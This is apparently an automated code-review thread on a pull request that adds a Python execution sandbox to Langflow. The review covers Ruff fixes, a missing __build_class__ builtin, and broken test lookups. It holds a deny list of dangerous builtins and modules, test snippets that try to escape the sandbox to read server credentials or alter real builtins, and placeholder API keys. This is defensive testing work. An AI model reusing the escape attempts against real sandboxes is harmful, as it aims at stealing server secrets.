- )
+ if module_name in BLOCKED_MODULES:
+ msg = (
+ f"Dangerous module '{module_name}' is blocked. "
+ "Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."
+ )
+ raise SecurityViolation(msg)

These changes should clear the current Ruff complaints without altering sandbox behavior.
Also applies to: 96-139, 152-163
🧰 Tools
🪛 GitHub Check: Ruff Style Check (3.13)
[failure] 17-17: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:17:7: N818 Exception name SecurityViolation should be named with an Error suffix
🤖 Prompt for AI Agents
In src/lfx/src/lfx/custom/sandbox.py around lines 17-18, 96-139, 152-163, update
exception naming and simplify/clean up try/except and long exception messages:
rename SecurityViolation to SecurityViolationError (or add a local noqa: N818
comment) to satisfy N818; replace try/except AttributeError blocks around
getattr(builtins, name) with contextlib.suppress(AttributeError) to simplify
control flow; and refactor any long f-string messages used in raise
SecurityViolation(...) into a separately assigned message variable (message =
f"...") and then raise the exception with that variable (raise
SecurityViolationError(message)) to avoid EM102/TRY003/E501 style violations.
Ensure imports are added (contextlib) and update all occurrences consistently
without changing runtime behavior.
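Pulling those suggestions together, a minimal sketch is shown below. It assumes the rename to `SecurityViolationError` is acceptable; the `BLOCKED_BUILTINS` and `ALLOW_DANGEROUS_CODE` values here are stand-ins for the module's real globals, not the actual configuration.

```python
import builtins
import contextlib

# Stand-ins for the module's existing globals; the real values live in sandbox.py.
BLOCKED_BUILTINS: set[str] = {"eval", "exec", "compile", "open"}
ALLOW_DANGEROUS_CODE = False


class SecurityViolationError(Exception):  # "Error" suffix satisfies Ruff N818
    """Raised when code attempts to escape the sandbox or use blocked operations."""


def copy_safe_builtins() -> dict:
    isolated: dict = {}
    for name in dir(builtins):
        if name.startswith("_"):
            continue
        if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
            continue
        with contextlib.suppress(AttributeError):  # replaces try/except AttributeError: pass
            isolated[name] = getattr(builtins, name)
    return isolated


def check_builtin(name: str) -> None:
    if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
        msg = (  # assign first so EM102/TRY003/E501 stay quiet
            f"Dangerous builtin '{name}' is blocked. "
            "Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."
        )
        raise SecurityViolationError(msg)
```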
| essential_underscore_builtins = ["__name__", "__doc__", "__package__", "__loader__", "__spec__"] | ||
| for name in essential_underscore_builtins: | ||
| if hasattr(builtins, name): | ||
| isolated_builtins[name] = getattr(builtins, name) | ||
|
|
||
| # Critical: Make __builtins__ point to this isolated copy, not the real one | ||
| # This prevents code from accessing the real builtins module | ||
| isolated_builtins["__builtins__"] = isolated_builtins.copy() | ||
|
|
||
| # Prevent access to the real builtins module | ||
| # If code tries to import builtins, they get our isolated version | ||
| class IsolatedBuiltinsModule: | ||
| """Fake builtins module that prevents escaping.""" | ||
|
|
||
| def __getattr__(self, name: str) -> Any: | ||
| # Block dangerous builtins unless explicitly allowed | ||
| if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS: | ||
| raise SecurityViolation( | ||
| f"Dangerous builtin '{name}' is blocked. Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow." | ||
| ) | ||
| if name == "__builtins__": | ||
| return isolated_builtins | ||
| if hasattr(builtins, name): | ||
| return getattr(builtins, name) | ||
| raise AttributeError(f"module 'builtins' has no attribute '{name}'") | ||
|
|
||
| isolated_builtins["builtins"] = IsolatedBuiltinsModule() | ||
|
|
||
| return isolated_builtins |
🧩 Analysis chain
Include __build_class__ in isolated builtins to support class definitions inside the sandbox
create_isolated_builtins currently copies only non-underscore names from builtins and then manually whitelists a few underscored ones ("__name__", "__doc__", etc.). It does not include __build_class__, which Python uses whenever a class statement is executed.
Consequence: executing code that actually runs a class definition within the sandbox (e.g., top-level class Foo: ... in code passed to execute_in_sandbox) will fail with NameError: __build_class__ is not defined, even when the code is otherwise totally benign. That’s surprising for callers and will make it hard to sandbox any code that defines classes.
You should add __build_class__ to the essential underscore builtins so it’s available in the sandbox:
- essential_underscore_builtins = ["__name__", "__doc__", "__package__", "__loader__", "__spec__"]
+ essential_underscore_builtins = [
+ "__name__",
+ "__doc__",
+ "__package__",
+ "__loader__",
+ "__spec__",
+ "__build_class__", # Needed for executing class definitions
+ ]

This keeps class definitions functional inside the sandbox without weakening your security guarantees.
Also applies to: 179-236
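For reference, the failure mode is reproducible in plain CPython without any of this PR's sandbox machinery; the snippet below is a standalone illustration of the `__build_class__` requirement, not code from the repository.

```python
import builtins

# A `class` statement compiles to LOAD_BUILD_CLASS, which looks up
# __build_class__ in the builtins mapping supplied to exec().
code = compile("class Foo:\n    pass\n", "<demo>", "exec")

try:
    exec(code, {"__builtins__": {}, "__name__": "demo"})  # no __build_class__ available
except NameError as err:
    print(err)  # __build_class__ not found

minimal_builtins = {"__build_class__": builtins.__build_class__}
exec(code, {"__builtins__": minimal_builtins, "__name__": "demo"})
print("class statement executes once __build_class__ is provided")
```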
🏁 Script executed:
#!/bin/bash
# Demonstrate the need for __build_class__ when executing a class definition in the sandbox.
python - << 'PY'
from lfx.custom.sandbox import create_isolated_builtins, execute_in_sandbox
import ast
code = "class Foo:\n pass\n"
code_obj = compile(code, "<sandbox-test>", "exec")
globals_ctx = {}
try:
execute_in_sandbox(code_obj, globals_ctx)
print("Executed class definition successfully")
except Exception as e:
print("Exception during sandboxed class definition:", type(e).__name__, e)
PY

Length of output: 115
---
🏁 Script executed:
#!/bin/bash
# Locate the sandbox.py file
fd -type f -name "sandbox.py"
Length of output: 170
🏁 Script executed:
#!/bin/bash
# Examine the create_isolated_builtins function and surrounding context
cat src/lfx/src/lfx/custom/sandbox.py | head -200

Length of output: 7266
🏁 Script executed:
#!/bin/bash
# Search for any references to __build_class__ in the sandbox.py file
rg -n "__build_class__" src/lfx/src/lfx/custom/sandbox.pyLength of output: 0
🏁 Script executed:
#!/bin/bash
# Search for essential_underscore_builtins in the file
rg -n "essential_underscore_builtins" src/lfx/src/lfx/custom/sandbox.py -A 5Length of output: 419
---
🏁 Script executed:
#!/bin/bash
# Examine lines 150-250 to see execute_in_sandbox and the second location (179-236)
sed -n '150,250p' src/lfx/src/lfx/custom/sandbox.py
Length of output: 3954
🏁 Script executed:
#!/bin/bash
# Search for all uses of execute_in_sandbox to understand the impact
rg -n "execute_in_sandbox" src/lfx/src/lfx/custom/sandbox.py -B 2 -A 2Length of output: 155
Add __build_class__ to essential underscore builtins to support class definitions inside the sandbox
The verification confirms the issue: __build_class__ is missing from the essential_underscore_builtins list at line 111, and Python requires this builtin whenever a class statement executes. Any code attempt to define a class in the sandbox will fail with NameError: __build_class__ is not defined.
The suggested fix is correct and necessary:
- essential_underscore_builtins = ["__name__", "__doc__", "__package__", "__loader__", "__spec__"]
+ essential_underscore_builtins = [
+ "__name__",
+ "__doc__",
+ "__package__",
+ "__loader__",
+ "__spec__",
+ "__build_class__", # Needed for executing class definitions
+ ]

Apply this change at line 111 in src/lfx/src/lfx/custom/sandbox.py.
📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| essential_underscore_builtins = ["__name__", "__doc__", "__package__", "__loader__", "__spec__"] | |
| for name in essential_underscore_builtins: | |
| if hasattr(builtins, name): | |
| isolated_builtins[name] = getattr(builtins, name) | |
| # Critical: Make __builtins__ point to this isolated copy, not the real one | |
| # This prevents code from accessing the real builtins module | |
| isolated_builtins["__builtins__"] = isolated_builtins.copy() | |
| # Prevent access to the real builtins module | |
| # If code tries to import builtins, they get our isolated version | |
| class IsolatedBuiltinsModule: | |
| """Fake builtins module that prevents escaping.""" | |
| def __getattr__(self, name: str) -> Any: | |
| # Block dangerous builtins unless explicitly allowed | |
| if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS: | |
| raise SecurityViolation( | |
| f"Dangerous builtin '{name}' is blocked. Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow." | |
| ) | |
| if name == "__builtins__": | |
| return isolated_builtins | |
| if hasattr(builtins, name): | |
| return getattr(builtins, name) | |
| raise AttributeError(f"module 'builtins' has no attribute '{name}'") | |
| isolated_builtins["builtins"] = IsolatedBuiltinsModule() | |
| return isolated_builtins | |
| essential_underscore_builtins = [ | |
| "__name__", | |
| "__doc__", | |
| "__package__", | |
| "__loader__", | |
| "__spec__", | |
| "__build_class__", # Needed for executing class definitions | |
| ] | |
| for name in essential_underscore_builtins: | |
| if hasattr(builtins, name): | |
| isolated_builtins[name] = getattr(builtins, name) | |
| # Critical: Make __builtins__ point to this isolated copy, not the real one | |
| # This prevents code from accessing the real builtins module | |
| isolated_builtins["__builtins__"] = isolated_builtins.copy() | |
| # Prevent access to the real builtins module | |
| # If code tries to import builtins, they get our isolated version | |
| class IsolatedBuiltinsModule: | |
| """Fake builtins module that prevents escaping.""" | |
| def __getattr__(self, name: str) -> Any: | |
| # Block dangerous builtins unless explicitly allowed | |
| if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS: | |
| raise SecurityViolation( | |
| f"Dangerous builtin '{name}' is blocked. Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow." | |
| ) | |
| if name == "__builtins__": | |
| return isolated_builtins | |
| if hasattr(builtins, name): | |
| return getattr(builtins, name) | |
| raise AttributeError(f"module 'builtins' has no attribute '{name}'") | |
| isolated_builtins["builtins"] = IsolatedBuiltinsModule() | |
| return isolated_builtins |
🧰 Tools
🪛 GitHub Check: Ruff Style Check (3.13)
[failure] 135-135: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:135:34: EM102 Exception must not use an f-string literal, assign to variable first
[failure] 135-135: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:135:19: TRY003 Avoid specifying long messages outside the exception class
[failure] 129-129: Ruff (E501)
src/lfx/src/lfx/custom/sandbox.py:129:121: E501 Line too long (121 > 120)
[failure] 129-129: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:129:21: EM102 Exception must not use an f-string literal, assign to variable first
[failure] 128-130: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:128:23: TRY003 Avoid specifying long messages outside the exception class
🤖 Prompt for AI Agents
In src/lfx/src/lfx/custom/sandbox.py around lines 111 to 139, the list
essential_underscore_builtins is missing "__build_class__", causing any class
definition inside the sandbox to raise NameError; add "__build_class__" to that
list so the sandbox provides the class-construction builtin, ensuring class
statements work correctly while keeping the rest of the isolated builtins
behavior unchanged.
| def test_sandbox_cannot_access_parent_globals(): | ||
| """Test that sandboxed code cannot access parent function's globals.""" | ||
| # Set a variable in the parent scope | ||
| parent_var = "should_not_be_accessible" | ||
|
|
||
| code = """ | ||
| def test(): | ||
| # Try to access parent_var from parent scope | ||
| # If isolation were broken, this would work | ||
| return parent_var | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| # Execute in sandbox | ||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Try to call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # Should raise NameError because parent_var is not accessible | ||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
|
|
||
| def test_sandbox_cannot_modify_parent_globals(): | ||
| """Test that sandboxed code cannot modify parent scope's globals.""" | ||
| parent_dict = {"value": "original"} | ||
|
|
||
| code = """ | ||
| def test(): | ||
| # Try to modify parent_dict | ||
| # If isolation were broken, this would modify the real parent_dict | ||
| parent_dict["value"] = "modified" | ||
| return parent_dict["value"] | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function - should fail because parent_dict is not accessible | ||
| test_func = exec_globals["test"] | ||
|
|
||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
| # Verify parent_dict was not modified | ||
| assert parent_dict["value"] == "original" | ||
|
|
||
|
|
||
| def test_sandbox_isolated_builtins(): | ||
| """Test that sandbox uses isolated builtins, not real ones.""" | ||
| # Create a marker in real builtins (simulating server state) | ||
| import builtins | ||
|
|
||
| original_builtins_len = len(dir(builtins)) | ||
|
|
||
| code = """ | ||
| def test(): | ||
| import builtins | ||
| # Try to access real builtins | ||
| # If isolation were broken, we could modify real builtins | ||
| builtins.ESCAPE_TEST = "should_not_exist" | ||
| return hasattr(builtins, 'ESCAPE_TEST') | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
| result = test_func() | ||
|
|
||
| # Should return False or True but not affect real builtins | ||
| # Verify real builtins wasn't modified | ||
| assert not hasattr(builtins, "ESCAPE_TEST") | ||
| assert len(dir(builtins)) == original_builtins_len | ||
|
|
||
|
|
||
| def test_sandbox_fresh_namespace_per_execution(): | ||
| """Test that each execution gets a fresh isolated namespace.""" | ||
| code1 = """ | ||
| GLOBAL_VAR = "first_execution" | ||
| def test(): | ||
| return GLOBAL_VAR | ||
| """ | ||
| code_obj1 = compile(code1, "<test>", "exec") | ||
| exec_globals1 = {} | ||
| execute_in_sandbox(code_obj1, exec_globals1) | ||
|
|
||
| # Second execution with different code | ||
| code2 = """ | ||
| def test(): | ||
| # Try to access GLOBAL_VAR from previous execution | ||
| # If isolation were broken, this would work | ||
| return GLOBAL_VAR | ||
| """ | ||
| code_obj2 = compile(code2, "<test>", "exec") | ||
| exec_globals2 = {} | ||
| execute_in_sandbox(code_obj2, exec_globals2) | ||
|
|
||
| # Should raise NameError because GLOBAL_VAR doesn't exist in this execution | ||
| test_func = exec_globals2["test"] | ||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
|
|
||
| def test_sandbox_cannot_access_frame_locals(): | ||
| """Test that sandboxed code cannot access caller's local variables.""" | ||
|
|
||
| def caller_function(): | ||
| local_var = "should_not_be_accessible" | ||
|
|
||
| code = """ | ||
| def test(): | ||
| # Try to access local_var from caller | ||
| # If isolation were broken, this would work | ||
| return local_var | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # Should raise NameError because local_var is not accessible | ||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
| caller_function() | ||
|
|
🧩 Analysis chain
Sandbox tests assume exec_globals is mutated, but execute_in_sandbox does not currently do that
Across these tests you call:
exec_globals = {}
execute_in_sandbox(code_obj, exec_globals)
test_func = exec_globals["test"]

and then assert behavior by calling `test_func()` (e.g., expecting `NameError`). However, `execute_in_sandbox` creates its own `sandbox_globals` dict, updates it with `exec_globals`, and never writes symbols back into `exec_globals`. As a result `exec_globals` stays empty and `exec_globals["test"]` will raise `KeyError` before any of the `pytest.raises(...)` blocks are exercised.
You likely want one of:
- Keep sandbox one‑way (safer) and update tests to assert on errors from
execute_in_sandboxitself, or to evaluate access attempts at module level inside the sandboxed code (soexecute_in_sandboxraises theNameError/SecurityViolationyou check), rather than trying to call sandboxed functions viaexec_globals; or - Change
execute_in_sandbox’s contract so it exports selected symbols (e.g., top‑level defs) back intoexec_globalsafter execution, then yourexec_globals["test"]pattern would work, but that does loosen the API surface of the sandbox.
Right now, as written, these tests won’t be validating isolation properties but will instead fail on lookup of "test".
Also applies to: 179-220
🏁 Script executed:
#!/bin/bash
# Verify current execute_in_sandbox behavior with respect to exec_globals.
python - << 'PY'
from lfx.custom.sandbox import execute_in_sandbox
import ast
code = "def test():\n return 42\n"
code_obj = compile(code, "<test>", "exec")
exec_globals = {}
execute_in_sandbox(code_obj, exec_globals)
print("exec_globals keys after execute_in_sandbox:", list(exec_globals.keys()))
PYLength of output: 115
---
🏁 Script executed:
```shell
#!/bin/bash
# Locate execute_in_sandbox function definition
rg -n "def execute_in_sandbox" --type=py
Length of output: 114
🏁 Script executed:
#!/bin/bash
# Find sandbox-related module files
fd -e py "sandbox" --type fLength of output: 136
🏁 Script executed:
#!/bin/bash
# Read execute_in_sandbox implementation
cat src/lfx/src/lfx/custom/sandbox.py | sed -n '179,250p'Length of output: 2584
🏁 Script executed:
#!/bin/bash
# Check if test_sandbox_security.py has similar patterns or different approach
head -100 src/lfx/tests/unit/custom/test_sandbox_security.pyLength of output: 3707
Sandbox tests assume exec_globals is mutated, but execute_in_sandbox does not currently do that
Across these tests you call:
exec_globals = {}
execute_in_sandbox(code_obj, exec_globals)
test_func = exec_globals["test"]and then assert behavior by calling test_func() (e.g., expecting NameError). However, execute_in_sandbox creates its own sandbox_globals dict, reads from exec_globals via update(), and never writes symbols back into exec_globals. As a result exec_globals stays empty and exec_globals["test"] will raise KeyError before any of the pytest.raises(...) blocks are exercised.
You likely want one of:
- Keep sandbox one‑way (safer) and update tests to assert on errors from
execute_in_sandboxitself, or to evaluate access attempts at module level inside the sandboxed code (soexecute_in_sandboxraises theNameError/SecurityViolationyou check), rather than trying to call sandboxed functions viaexec_globals; or - Change
execute_in_sandbox's contract so it exports selected symbols (e.g., top‑level defs) back intoexec_globalsafter execution, then yourexec_globals["test"]pattern would work, but that does loosen the API surface of the sandbox.
Right now, as written, these tests won't be validating isolation properties but will instead fail on lookup of "test".
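If the second option is chosen, one possible shape of the exporting variant is sketched below. It is an illustration of the contract change under the structure described in this review (an isolated builtins mapping merged with the caller's globals), not the PR's actual implementation, and the wrapper name is invented.

```python
from types import CodeType
from typing import Any

from lfx.custom.sandbox import create_isolated_builtins  # helper referenced elsewhere in this review


def execute_in_sandbox_exporting(code_obj: CodeType, exec_globals: dict[str, Any]) -> None:
    """Run code in isolation, then copy its top-level definitions back to the caller."""
    sandbox_globals: dict[str, Any] = {
        "__builtins__": create_isolated_builtins(),
        "__name__": "__sandbox__",
    }
    sandbox_globals.update(exec_globals)

    exec(code_obj, sandbox_globals)  # noqa: S102 - deliberate, isolated exec

    # Export only names the executed code created (skip dunders and anything the
    # caller already supplied) so callers can look up exec_globals["test"].
    for name, value in sandbox_globals.items():
        if not name.startswith("__") and name not in exec_globals:
            exec_globals[name] = value
```

Because exported functions keep the isolated `sandbox_globals` as their `__globals__`, calling `exec_globals["test"]()` afterwards still raises `NameError` for server-side names, which is exactly what these isolation tests assert.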
| server_api_key = "sk-secret-key-12345" | ||
| server_db_password = "db_password_secret" | ||
| server_config = {"api_key": server_api_key, "database_url": "postgresql://user:password@localhost/db"} |
Fake API keys will trigger gitleaks and other secret scanners
The hard‑coded strings like:
server_api_key = "sk-secret-key-12345"(Line 29)self.api_key = "sk-secret-12345"(Line 63)
match generic API‑key patterns and are already being flagged by gitleaks. Even though these are clearly test values, they will cause CI noise or failures.
Consider changing them to values that don’t resemble real keys (and avoid common prefixes like sk-), e.g.:
- server_api_key = "sk-secret-key-12345"
+ server_api_key = "FAKE_SERVER_API_KEY_FOR_TESTS"
@@
- self.api_key = "sk-secret-12345"
+ self.api_key = "FAKE_SERVER_CONFIG_API_KEY_FOR_TESTS"or add explicit allowlist annotations consistent with your secret‑scanning configuration.
Also applies to: 63-66
🧰 Tools
🪛 Gitleaks (8.29.0)
[high] 29-29: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
🤖 Prompt for AI Agents
In src/lfx/tests/unit/custom/test_sandbox_security.py around lines 29-31 and
63-66, replace hard-coded strings that resemble real API keys (e.g. values with
sk- or sk-secret prefixes) with clearly non-secret test identifiers or reference
test fixtures/env vars, or add an explicit secret-scan allowlist annotation per
our CI configuration; ensure new values do not match common API-key patterns
(avoid prefixes like "sk-", long hex/base64 blobs, or "secret") and prefer
simple labels such as "test-api-key-1" or read the value from a test-only
config/env var, updating tests accordingly.
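As one concrete illustration of the "clearly non-secret test identifiers" option, a hypothetical fixture is sketched below; the fixture name and every value are invented for this example and only need to avoid key-like patterns.

```python
import pytest


@pytest.fixture
def fake_server_secrets() -> dict:
    # Deliberately plain values: no "sk-" prefix, no long hex/base64 blobs,
    # so gitleaks and similar scanners have nothing to match on.
    return {
        "server_api_key": "test-api-key-1",
        "server_db_password": "test-db-credential-1",
        "server_config": {
            "api_key": "test-api-key-1",
            "database_url": "postgresql://localhost/testdb",
        },
    }
```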
| code = """ | ||
| def test(): | ||
| # Try to access server's Python variables containing secrets | ||
| # If isolation is broken, these would be accessible | ||
| return server_api_key, server_db_password, server_config | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # CRITICAL: Should raise NameError - server secrets are not accessible | ||
| # This is what prevents credential theft | ||
| with pytest.raises(NameError): | ||
| test_func() |
🧩 Analysis chain
exec_globals["test"] never populated by execute_in_sandbox
All tests in this file follow the pattern:
exec_globals = {}
execute_in_sandbox(code_obj, exec_globals)
test_func = exec_globals["test"]
with pytest.raises(NameError):
    test_func()
However, the current execute_in_sandbox implementation constructs its own sandbox_globals dict, merges exec_globals into it, and then executes exec(code_obj, sandbox_globals, sandbox_locals) without writing anything back to exec_globals. That means exec_globals remains empty and exec_globals["test"] will raise KeyError before your pytest.raises(NameError) assertions ever run. The same issue affects every test using this pattern (lines 33‑50, 69‑86, 98‑129, 140‑160, 172‑188, 195‑214, 226‑249, 261‑275).
Two options:
- Adjust tests to assert on the exception raised by `execute_in_sandbox` itself (and call `test()` from within the code string), e.g.:
- code = """
-def test():
- # Try to access server's Python variables containing secrets
- # If isolation is broken, these would be accessible
- return server_api_key, server_db_password, server_config
-"""
+ code = """
+def test():
+ # Try to access server's Python variables containing secrets
+ # If isolation is broken, these would be accessible
+ return server_api_key, server_db_password, server_config
+
+# Call inside the sandbox so NameError is raised during execute_in_sandbox
+test()
+"""
@@
- code_obj = compile(code, "<test>", "exec")
- exec_globals = {}
-
- execute_in_sandbox(code_obj, exec_globals)
-
- # Call the function
- test_func = exec_globals["test"]
-
- # CRITICAL: Should raise NameError - server secrets are not accessible
- # This is what prevents credential theft
- with pytest.raises(NameError):
- test_func()
+ code_obj = compile(code, "<test>", "exec")
+ exec_globals = {}
+
+ # CRITICAL: Should raise NameError - server secrets are not accessible
+ # This is what prevents credential theft
+ with pytest.raises(NameError):
+ execute_in_sandbox(code_obj, exec_globals)

- Or, if the intended contract is that sandboxed definitions are exported back into `exec_globals`, update `execute_in_sandbox` to propagate selected names (e.g., functions) out of the internal `sandbox_globals` into `exec_globals`.
Right now, the tests and the sandbox API are not aligned, and the assertions won’t be exercising the intended NameError behavior.
🏁 Script executed:
#!/bin/bash
# Find execute_in_sandbox function definition
rg -n "def execute_in_sandbox" --type pyLength of output: 114
🏁 Script executed:
#!/bin/bash
# Find where execute_in_sandbox is imported/used in test file
rg -n "execute_in_sandbox" src/lfx/tests/unit/custom/test_sandbox_security.py -B2 -A2Length of output: 1022
🏁 Script executed:
#!/bin/bash
# Get the full test file to understand structure
cat src/lfx/tests/unit/custom/test_sandbox_security.py

Length of output: 9640
🏁 Script executed:
#!/bin/bash
# Find all Python files that might contain execute_in_sandbox definition
fd -e py -x rg -l "def execute_in_sandbox" {} \;Length of output: 35
🏁 Script executed:
#!/bin/bash
# Search more broadly for execute_in_sandbox in the codebase
rg -n "execute_in_sandbox" --type py -C3Length of output: 12538
🏁 Script executed:
#!/bin/bash
# Get the execute_in_sandbox function implementation
sed -n '179,250p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 2584
🏁 Script executed:
#!/bin/bash
# Get full sandbox.py file for complete context
cat src/lfx/src/lfx/custom/sandbox.py

Length of output: 8824
Tests fail with KeyError before asserting intended NameError behavior
The review comment is correct. In execute_in_sandbox, definitions created by exec(code_obj, sandbox_globals, sandbox_locals) are placed into sandbox_globals, not the passed-in exec_globals parameter. Since exec_globals is never updated after execution, the test pattern fails at exec_globals["test"] with KeyError before the NameError assertions can run.
This affects all tests in the file: lines 33–50, 69–86, 98–129, 140–160, 172–188, 195–214, 226–249, 261–275.
Choose one solution:
- Move the function call into the code string so `NameError` is raised during `execute_in_sandbox`:
code = """
def test():
return server_api_key, server_db_password, server_config
test()
"""
with pytest.raises(NameError):
execute_in_sandbox(code_obj, exec_globals)- Update
execute_in_sandboxto propagate selected definitions (e.g., functions) back intoexec_globalsafter execution.
Summary by CodeRabbit
New Features
Security